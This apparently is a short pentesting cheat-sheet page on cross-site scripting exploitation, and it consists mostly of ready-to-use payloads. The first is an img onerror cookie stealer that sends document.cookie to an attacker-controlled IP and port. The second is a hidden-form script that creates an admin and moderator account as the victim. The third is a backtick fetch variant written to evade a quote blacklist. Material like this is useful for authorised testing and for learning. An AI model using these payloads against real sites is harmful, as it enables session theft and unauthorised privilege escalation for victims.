Exploitation

Before stealing cookies make sure http only is set to false.

<img src onerror=window.location.replace("http://[IP]:[PORT]/a"+document.cookie);>

Execute action with JavaScript

Whenever you want to execute some action as another user using XSS you can take the payload below and modify it to your needs.

var form = document.createElement("form");
form.method = "POST";
form.action = "http://[URL]:PORT/admin/users/create";

["name", "email", "isAdmin", "isMod"].forEach(function (key) {
  var input = document.createElement("input");
  input.type = "hidden";
  input.name = key;
  input.value = {
    name: "exploit",
    email: "aa",
    isAdmin: "True",
    isMod: "True"
  }[key];
  form.appendChild(input);
});

document.body.appendChild(form);
form.submit();

No ' or " version

Sometimes some chars are blacklisted - in the example below we sucessfully bypassed the blacklisting using backticks:

fetch(`http://[URL]:[PORT]/admin/users/create`,{method:`POST`,headers:{[`Content-Type`]:`application/x-www-form-urlencoded`},body:`name=exploit&email=aa&isAdmin=True&isMod=True`})

PreviousCross Site Scripting NextHunting for files

Last updated 3 months ago

XSS Cookie Stealer

Execute action with JavaScript

No ' or " version